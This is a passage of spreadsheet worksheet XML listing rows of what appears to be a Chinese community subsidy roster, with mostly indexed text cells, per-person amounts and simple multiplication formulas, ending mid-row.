    <row r="2661" ht="23" customHeight="1" spans="1:11">
      <c r="A2661" s="13" t="s">
        <v>7016</v>
      </c>
      <c r="B2661" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2661" s="14" t="s">
        <v>7017</v>
      </c>
      <c r="D2661" s="14" t="s">
        <v>7018</v>
      </c>
      <c r="E2661" s="14" t="s">
        <v>7019</v>
      </c>
      <c r="F2661" s="14" t="s">
        <v>7020</v>
      </c>
      <c r="G2661" s="14">
        <v>1</v>
      </c>
      <c r="H2661" s="14">
        <v>340</v>
      </c>
      <c r="I2661" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2661" s="14" t="s">
        <v>6176</v>
      </c>
      <c r="K2661" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2662" ht="23" customHeight="1" spans="1:11">
      <c r="A2662" s="13" t="s">
        <v>7021</v>
      </c>
      <c r="B2662" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2662" s="14" t="s">
        <v>3551</v>
      </c>
      <c r="D2662" s="14" t="s">
        <v>7022</v>
      </c>
      <c r="E2662" s="14" t="s">
        <v>7023</v>
      </c>
      <c r="F2662" s="14" t="s">
        <v>6986</v>
      </c>
      <c r="G2662" s="14">
        <v>1</v>
      </c>
      <c r="H2662" s="14">
        <v>340</v>
      </c>
      <c r="I2662" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2662" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2662" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2663" ht="23" customHeight="1" spans="1:11">
      <c r="A2663" s="13" t="s">
        <v>7024</v>
      </c>
      <c r="B2663" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2663" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="D2663" s="14" t="s">
        <v>7025</v>
      </c>
      <c r="E2663" s="14" t="s">
        <v>7026</v>
      </c>
      <c r="F2663" s="14" t="s">
        <v>6982</v>
      </c>
      <c r="G2663" s="14">
        <v>1</v>
      </c>
      <c r="H2663" s="14">
        <v>340</v>
      </c>
      <c r="I2663" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2663" s="24">
        <v>45627</v>
      </c>
      <c r="K2663" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2664" ht="23" customHeight="1" spans="1:11">
      <c r="A2664" s="13" t="s">
        <v>7027</v>
      </c>
      <c r="B2664" s="84" t="s">
        <v>6980</v>
      </c>
      <c r="C2664" s="86" t="s">
        <v>7028</v>
      </c>
      <c r="D2664" s="86" t="s">
        <v>7029</v>
      </c>
      <c r="E2664" s="84" t="s">
        <v>239</v>
      </c>
      <c r="F2664" s="14" t="s">
        <v>6986</v>
      </c>
      <c r="G2664" s="14">
        <v>1</v>
      </c>
      <c r="H2664" s="14">
        <v>340</v>
      </c>
      <c r="I2664" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2664" s="24">
        <v>45505</v>
      </c>
      <c r="K2664" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2665" ht="23" customHeight="1" spans="1:11">
      <c r="A2665" s="13" t="s">
        <v>7030</v>
      </c>
      <c r="B2665" s="14" t="s">
        <v>6980</v>
      </c>
      <c r="C2665" s="14" t="s">
        <v>3539</v>
      </c>
      <c r="D2665" s="14" t="s">
        <v>7031</v>
      </c>
      <c r="E2665" s="14" t="s">
        <v>3706</v>
      </c>
      <c r="F2665" s="14" t="s">
        <v>7020</v>
      </c>
      <c r="G2665" s="14">
        <v>1</v>
      </c>
      <c r="H2665" s="14">
        <v>340</v>
      </c>
      <c r="I2665" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2665" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2665" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2666" ht="23" customHeight="1" spans="1:11">
      <c r="A2666" s="13" t="s">
        <v>7032</v>
      </c>
      <c r="B2666" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2666" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2666" s="14" t="s">
        <v>7035</v>
      </c>
      <c r="E2666" s="14" t="s">
        <v>5251</v>
      </c>
      <c r="F2666" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2666" s="14">
        <v>1</v>
      </c>
      <c r="H2666" s="14">
        <v>340</v>
      </c>
      <c r="I2666" s="14">
        <f t="shared" si="126"/>
        <v>340</v>
      </c>
      <c r="J2666" s="24">
        <v>45108</v>
      </c>
      <c r="K2666" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2667" ht="23" customHeight="1" spans="1:11">
      <c r="A2667" s="13" t="s">
        <v>7036</v>
      </c>
      <c r="B2667" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2667" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2667" s="14" t="s">
        <v>7037</v>
      </c>
      <c r="E2667" s="14" t="s">
        <v>7038</v>
      </c>
      <c r="F2667" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2667" s="14">
        <v>2</v>
      </c>
      <c r="H2667" s="14">
        <v>300</v>
      </c>
      <c r="I2667" s="14">
        <f t="shared" si="126"/>
        <v>600</v>
      </c>
      <c r="J2667" s="24">
        <v>45108</v>
      </c>
      <c r="K2667" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2668" ht="23" customHeight="1" spans="1:11">
      <c r="A2668" s="13" t="s">
        <v>7039</v>
      </c>
      <c r="B2668" s="14" t="str">
        <f>B2667</f>
        <v>军工办</v>
      </c>
      <c r="C2668" s="14" t="str">
        <f>C2667</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2668" s="18" t="s">
        <v>7040</v>
      </c>
      <c r="E2668" s="18" t="s">
        <v>5317</v>
      </c>
      <c r="F2668" s="14" t="str">
        <f>F2667</f>
        <v>4113210699</v>
      </c>
      <c r="G2668" s="14"/>
      <c r="H2668" s="14"/>
      <c r="I2668" s="14"/>
      <c r="J2668" s="24"/>
      <c r="K2668" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2669" ht="23" customHeight="1" spans="1:11">
      <c r="A2669" s="13" t="s">
        <v>7041</v>
      </c>
      <c r="B2669" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2669" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2669" s="14" t="s">
        <v>7042</v>
      </c>
      <c r="E2669" s="14" t="s">
        <v>7043</v>
      </c>
      <c r="F2669" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2669" s="14">
        <v>1</v>
      </c>
      <c r="H2669" s="14">
        <v>340</v>
      </c>
      <c r="I2669" s="14">
        <f t="shared" ref="I2669:I2682" si="127">H2669*G2669</f>
        <v>340</v>
      </c>
      <c r="J2669" s="24">
        <v>45108</v>
      </c>
      <c r="K2669" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2670" ht="23" customHeight="1" spans="1:11">
      <c r="A2670" s="13" t="s">
        <v>7044</v>
      </c>
      <c r="B2670" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2670" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2670" s="14" t="s">
        <v>7045</v>
      </c>
      <c r="E2670" s="14" t="s">
        <v>5061</v>
      </c>
      <c r="F2670" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2670" s="14">
        <v>1</v>
      </c>
      <c r="H2670" s="14">
        <v>340</v>
      </c>
      <c r="I2670" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2670" s="24">
        <v>45108</v>
      </c>
      <c r="K2670" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2671" ht="23" customHeight="1" spans="1:11">
      <c r="A2671" s="13" t="s">
        <v>7046</v>
      </c>
      <c r="B2671" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2671" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2671" s="14" t="s">
        <v>7047</v>
      </c>
      <c r="E2671" s="14" t="s">
        <v>587</v>
      </c>
      <c r="F2671" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2671" s="14">
        <v>1</v>
      </c>
      <c r="H2671" s="14">
        <v>340</v>
      </c>
      <c r="I2671" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2671" s="24">
        <v>45108</v>
      </c>
      <c r="K2671" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2672" ht="23" customHeight="1" spans="1:11">
      <c r="A2672" s="13" t="s">
        <v>7048</v>
      </c>
      <c r="B2672" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2672" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2672" s="14" t="s">
        <v>7049</v>
      </c>
      <c r="E2672" s="14" t="s">
        <v>7050</v>
      </c>
      <c r="F2672" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2672" s="14">
        <v>1</v>
      </c>
      <c r="H2672" s="14">
        <v>340</v>
      </c>
      <c r="I2672" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2672" s="24">
        <v>45108</v>
      </c>
      <c r="K2672" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2673" ht="23" customHeight="1" spans="1:11">
      <c r="A2673" s="13" t="s">
        <v>7051</v>
      </c>
      <c r="B2673" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2673" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2673" s="14" t="s">
        <v>7052</v>
      </c>
      <c r="E2673" s="14" t="s">
        <v>5028</v>
      </c>
      <c r="F2673" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2673" s="14">
        <v>1</v>
      </c>
      <c r="H2673" s="14">
        <v>340</v>
      </c>
      <c r="I2673" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2673" s="24">
        <v>45108</v>
      </c>
      <c r="K2673" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2674" ht="23" customHeight="1" spans="1:11">
      <c r="A2674" s="13" t="s">
        <v>7053</v>
      </c>
      <c r="B2674" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2674" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2674" s="14" t="s">
        <v>7054</v>
      </c>
      <c r="E2674" s="14" t="s">
        <v>4942</v>
      </c>
      <c r="F2674" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2674" s="14">
        <v>1</v>
      </c>
      <c r="H2674" s="14">
        <v>340</v>
      </c>
      <c r="I2674" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2674" s="24">
        <v>45108</v>
      </c>
      <c r="K2674" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2675" ht="23" customHeight="1" spans="1:11">
      <c r="A2675" s="13" t="s">
        <v>7055</v>
      </c>
      <c r="B2675" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2675" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2675" s="14" t="s">
        <v>7056</v>
      </c>
      <c r="E2675" s="14" t="s">
        <v>4942</v>
      </c>
      <c r="F2675" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2675" s="14">
        <v>1</v>
      </c>
      <c r="H2675" s="14">
        <v>340</v>
      </c>
      <c r="I2675" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2675" s="24">
        <v>45108</v>
      </c>
      <c r="K2675" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2676" ht="23" customHeight="1" spans="1:11">
      <c r="A2676" s="13" t="s">
        <v>7057</v>
      </c>
      <c r="B2676" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2676" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2676" s="14" t="s">
        <v>7058</v>
      </c>
      <c r="E2676" s="14" t="s">
        <v>5031</v>
      </c>
      <c r="F2676" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2676" s="14">
        <v>1</v>
      </c>
      <c r="H2676" s="14">
        <v>340</v>
      </c>
      <c r="I2676" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2676" s="24">
        <v>45108</v>
      </c>
      <c r="K2676" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2677" ht="23" customHeight="1" spans="1:11">
      <c r="A2677" s="13" t="s">
        <v>7059</v>
      </c>
      <c r="B2677" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2677" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2677" s="14" t="s">
        <v>7060</v>
      </c>
      <c r="E2677" s="14" t="s">
        <v>7061</v>
      </c>
      <c r="F2677" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2677" s="14">
        <v>1</v>
      </c>
      <c r="H2677" s="14">
        <v>340</v>
      </c>
      <c r="I2677" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2677" s="24">
        <v>45108</v>
      </c>
      <c r="K2677" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2678" ht="23" customHeight="1" spans="1:11">
      <c r="A2678" s="13" t="s">
        <v>7062</v>
      </c>
      <c r="B2678" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2678" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2678" s="14" t="s">
        <v>7063</v>
      </c>
      <c r="E2678" s="14" t="s">
        <v>7064</v>
      </c>
      <c r="F2678" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2678" s="14">
        <v>1</v>
      </c>
      <c r="H2678" s="14">
        <v>340</v>
      </c>
      <c r="I2678" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2678" s="24">
        <v>45108</v>
      </c>
      <c r="K2678" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2679" ht="23" customHeight="1" spans="1:11">
      <c r="A2679" s="13" t="s">
        <v>7065</v>
      </c>
      <c r="B2679" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2679" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2679" s="14" t="s">
        <v>7066</v>
      </c>
      <c r="E2679" s="14" t="s">
        <v>4962</v>
      </c>
      <c r="F2679" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2679" s="14">
        <v>1</v>
      </c>
      <c r="H2679" s="14">
        <v>340</v>
      </c>
      <c r="I2679" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2679" s="24">
        <v>45108</v>
      </c>
      <c r="K2679" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2680" ht="23" customHeight="1" spans="1:11">
      <c r="A2680" s="13" t="s">
        <v>7067</v>
      </c>
      <c r="B2680" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2680" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2680" s="14" t="s">
        <v>7068</v>
      </c>
      <c r="E2680" s="14" t="s">
        <v>5098</v>
      </c>
      <c r="F2680" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2680" s="14">
        <v>1</v>
      </c>
      <c r="H2680" s="14">
        <v>340</v>
      </c>
      <c r="I2680" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2680" s="24">
        <v>45108</v>
      </c>
      <c r="K2680" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2681" ht="23" customHeight="1" spans="1:11">
      <c r="A2681" s="13" t="s">
        <v>7069</v>
      </c>
      <c r="B2681" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2681" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2681" s="14" t="s">
        <v>7070</v>
      </c>
      <c r="E2681" s="14" t="s">
        <v>7071</v>
      </c>
      <c r="F2681" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2681" s="14">
        <v>1</v>
      </c>
      <c r="H2681" s="14">
        <v>340</v>
      </c>
      <c r="I2681" s="14">
        <f t="shared" si="127"/>
        <v>340</v>
      </c>
      <c r="J2681" s="24">
        <v>45108</v>
      </c>
      <c r="K2681" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2682" ht="23" customHeight="1" spans="1:11">
      <c r="A2682" s="13" t="s">
        <v>7072</v>
      </c>
      <c r="B2682" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2682" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2682" s="14" t="s">
        <v>7073</v>
      </c>
      <c r="E2682" s="14" t="s">
        <v>4927</v>
      </c>
      <c r="F2682" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2682" s="14">
        <v>3</v>
      </c>
      <c r="H2682" s="14">
        <v>265</v>
      </c>
      <c r="I2682" s="14">
        <f t="shared" si="127"/>
        <v>795</v>
      </c>
      <c r="J2682" s="24">
        <v>45108</v>
      </c>
      <c r="K2682" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2683" ht="23" customHeight="1" spans="1:11">
      <c r="A2683" s="13" t="s">
        <v>7074</v>
      </c>
      <c r="B2683" s="14" t="str">
        <f>B2682</f>
        <v>军工办</v>
      </c>
      <c r="C2683" s="14" t="str">
        <f>C2682</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2683" s="13" t="s">
        <v>7075</v>
      </c>
      <c r="E2683" s="13" t="s">
        <v>7076</v>
      </c>
      <c r="F2683" s="14" t="str">
        <f>F2682</f>
        <v>4113210699</v>
      </c>
      <c r="G2683" s="14"/>
      <c r="H2683" s="14"/>
      <c r="I2683" s="14"/>
      <c r="J2683" s="24"/>
      <c r="K2683" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2684" ht="23" customHeight="1" spans="1:11">
      <c r="A2684" s="13" t="s">
        <v>7077</v>
      </c>
      <c r="B2684" s="14" t="str">
        <f>B2683</f>
        <v>军工办</v>
      </c>
      <c r="C2684" s="14" t="str">
        <f>C2683</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2684" s="13" t="s">
        <v>7078</v>
      </c>
      <c r="E2684" s="19" t="s">
        <v>5494</v>
      </c>
      <c r="F2684" s="14" t="str">
        <f>F2683</f>
        <v>4113210699</v>
      </c>
      <c r="G2684" s="14"/>
      <c r="H2684" s="14"/>
      <c r="I2684" s="14"/>
      <c r="J2684" s="24"/>
      <c r="K2684" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2685" ht="23" customHeight="1" spans="1:11">
      <c r="A2685" s="13" t="s">
        <v>7079</v>
      </c>
      <c r="B2685" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2685" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2685" s="14" t="s">
        <v>7080</v>
      </c>
      <c r="E2685" s="14" t="s">
        <v>7081</v>
      </c>
      <c r="F2685" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2685" s="14">
        <v>1</v>
      </c>
      <c r="H2685" s="14">
        <v>340</v>
      </c>
      <c r="I2685" s="14">
        <f>H2685*G2685</f>
        <v>340</v>
      </c>
      <c r="J2685" s="24">
        <v>45108</v>
      </c>
      <c r="K2685" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2686" ht="23" customHeight="1" spans="1:11">
      <c r="A2686" s="13" t="s">
        <v>7082</v>
      </c>
      <c r="B2686" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2686" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2686" s="14" t="s">
        <v>7083</v>
      </c>
      <c r="E2686" s="14" t="s">
        <v>5098</v>
      </c>
      <c r="F2686" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2686" s="14">
        <v>1</v>
      </c>
      <c r="H2686" s="14">
        <v>340</v>
      </c>
      <c r="I2686" s="14">
        <f>H2686*G2686</f>
        <v>340</v>
      </c>
      <c r="J2686" s="24">
        <v>45108</v>
      </c>
      <c r="K2686" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2687" ht="23" customHeight="1" spans="1:11">
      <c r="A2687" s="13" t="s">
        <v>7084</v>
      </c>
      <c r="B2687" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2687" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2687" s="14" t="s">
        <v>7085</v>
      </c>
      <c r="E2687" s="14" t="s">
        <v>7086</v>
      </c>
      <c r="F2687" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2687" s="14">
        <v>2</v>
      </c>
      <c r="H2687" s="14">
        <v>300</v>
      </c>
      <c r="I2687" s="14">
        <f>H2687*G2687</f>
        <v>600</v>
      </c>
      <c r="J2687" s="14">
        <v>45231</v>
      </c>
      <c r="K2687" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2688" ht="23" customHeight="1" spans="1:11">
      <c r="A2688" s="13" t="s">
        <v>7087</v>
      </c>
      <c r="B2688" s="14" t="str">
        <f>B2687</f>
        <v>军工办</v>
      </c>
      <c r="C2688" s="14" t="str">
        <f>C2687</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2688" s="20" t="s">
        <v>7088</v>
      </c>
      <c r="E2688" s="20" t="s">
        <v>7089</v>
      </c>
      <c r="F2688" s="14" t="str">
        <f>F2687</f>
        <v>4113210699</v>
      </c>
      <c r="G2688" s="14"/>
      <c r="H2688" s="14"/>
      <c r="I2688" s="14"/>
      <c r="J2688" s="14"/>
      <c r="K2688" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2689" ht="23" customHeight="1" spans="1:11">
      <c r="A2689" s="13" t="s">
        <v>7090</v>
      </c>
      <c r="B2689" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2689" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2689" s="14" t="s">
        <v>7091</v>
      </c>
      <c r="E2689" s="14" t="s">
        <v>7092</v>
      </c>
      <c r="F2689" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2689" s="14">
        <v>2</v>
      </c>
      <c r="H2689" s="14">
        <v>300</v>
      </c>
      <c r="I2689" s="14">
        <f>H2689*G2689</f>
        <v>600</v>
      </c>
      <c r="J2689" s="14">
        <v>45231</v>
      </c>
      <c r="K2689" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2690" ht="23" customHeight="1" spans="1:11">
      <c r="A2690" s="13" t="s">
        <v>7093</v>
      </c>
      <c r="B2690" s="14" t="str">
        <f>B2689</f>
        <v>军工办</v>
      </c>
      <c r="C2690" s="14" t="str">
        <f>C2689</f>
        <v>红阳厂社区</v>
      </c>
      <c r="D2690" s="20" t="s">
        <v>7094</v>
      </c>
      <c r="E2690" s="20" t="s">
        <v>7095</v>
      </c>
      <c r="F2690" s="14" t="str">
        <f>F2689</f>
        <v>4113210699</v>
      </c>
      <c r="G2690" s="14"/>
      <c r="H2690" s="14"/>
      <c r="I2690" s="14"/>
      <c r="J2690" s="14"/>
      <c r="K2690" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2691" ht="23" customHeight="1" spans="1:11">
      <c r="A2691" s="13" t="s">
        <v>7096</v>
      </c>
      <c r="B2691" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2691" s="14" t="s">
        <v>7034</v>
      </c>
      <c r="D2691" s="14" t="s">
        <v>7097</v>
      </c>
      <c r="E2691" s="14" t="s">
        <v>3733</v>
      </c>
      <c r="F2691" s="14" t="s">
        <v>5540</v>
      </c>
      <c r="G2691" s="14">
        <v>1</v>
      </c>
      <c r="H2691" s="14">
        <v>340</v>
      </c>
      <c r="I2691" s="14">
        <f t="shared" ref="I2691:I2711" si="128">H2691*G2691</f>
        <v>340</v>
      </c>
      <c r="J2691" s="14">
        <v>45170</v>
      </c>
      <c r="K2691" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2692" ht="23" customHeight="1" spans="1:11">
      <c r="A2692" s="13" t="s">
        <v>7098</v>
      </c>
      <c r="B2692" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2692" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2692" s="14" t="s">
        <v>7100</v>
      </c>
      <c r="E2692" s="14" t="s">
        <v>3683</v>
      </c>
      <c r="F2692" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2692" s="14">
        <v>1</v>
      </c>
      <c r="H2692" s="14">
        <v>340</v>
      </c>
      <c r="I2692" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2692" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2692" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2693" ht="23" customHeight="1" spans="1:11">
      <c r="A2693" s="13" t="s">
        <v>7101</v>
      </c>
      <c r="B2693" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2693" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2693" s="14" t="s">
        <v>7102</v>
      </c>
      <c r="E2693" s="14" t="s">
        <v>7103</v>
      </c>
      <c r="F2693" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2693" s="14">
        <v>1</v>
      </c>
      <c r="H2693" s="14">
        <v>340</v>
      </c>
      <c r="I2693" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2693" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2693" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2694" ht="23" customHeight="1" spans="1:11">
      <c r="A2694" s="13" t="s">
        <v>7104</v>
      </c>
      <c r="B2694" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2694" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2694" s="14" t="s">
        <v>7105</v>
      </c>
      <c r="E2694" s="14" t="s">
        <v>3913</v>
      </c>
      <c r="F2694" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2694" s="14">
        <v>1</v>
      </c>
      <c r="H2694" s="14">
        <v>340</v>
      </c>
      <c r="I2694" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2694" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2694" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2695" ht="23" customHeight="1" spans="1:11">
      <c r="A2695" s="13" t="s">
        <v>7106</v>
      </c>
      <c r="B2695" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2695" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2695" s="14" t="s">
        <v>7107</v>
      </c>
      <c r="E2695" s="14" t="s">
        <v>3813</v>
      </c>
      <c r="F2695" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2695" s="14">
        <v>1</v>
      </c>
      <c r="H2695" s="14">
        <v>340</v>
      </c>
      <c r="I2695" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2695" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2695" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2696" ht="23" customHeight="1" spans="1:11">
      <c r="A2696" s="13" t="s">
        <v>7108</v>
      </c>
      <c r="B2696" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2696" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2696" s="14" t="s">
        <v>7109</v>
      </c>
      <c r="E2696" s="14" t="s">
        <v>7110</v>
      </c>
      <c r="F2696" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2696" s="14">
        <v>1</v>
      </c>
      <c r="H2696" s="14">
        <v>340</v>
      </c>
      <c r="I2696" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2696" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2696" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2697" ht="23" customHeight="1" spans="1:11">
      <c r="A2697" s="13" t="s">
        <v>7111</v>
      </c>
      <c r="B2697" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2697" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2697" s="14" t="s">
        <v>7112</v>
      </c>
      <c r="E2697" s="14" t="s">
        <v>3614</v>
      </c>
      <c r="F2697" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2697" s="14">
        <v>1</v>
      </c>
      <c r="H2697" s="14">
        <v>340</v>
      </c>
      <c r="I2697" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2697" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2697" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2698" ht="23" customHeight="1" spans="1:11">
      <c r="A2698" s="13" t="s">
        <v>7113</v>
      </c>
      <c r="B2698" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2698" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2698" s="14" t="s">
        <v>7114</v>
      </c>
      <c r="E2698" s="14" t="s">
        <v>3733</v>
      </c>
      <c r="F2698" s="14" t="s">
        <v>3788</v>
      </c>
      <c r="G2698" s="14">
        <v>1</v>
      </c>
      <c r="H2698" s="14">
        <v>340</v>
      </c>
      <c r="I2698" s="14">
        <f t="shared" si="128"/>
        <v>340</v>
      </c>
      <c r="J2698" s="14" t="s">
        <v>4320</v>
      </c>
      <c r="K2698" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2699" ht="23" customHeight="1" spans="1:11">
      <c r="A2699" s="13" t="s">
        <v>7115</v>
      </c>
      <c r="B2699" s="14" t="s">
        <v>7033</v>
      </c>
      <c r="C2699" s="14" t="s">
        <v>7099</v>
      </c>
      <c r="D2699" s="14" t="s">
        <v>3933</v>
      </c>
      <c r="E2699" s="14" t="s">
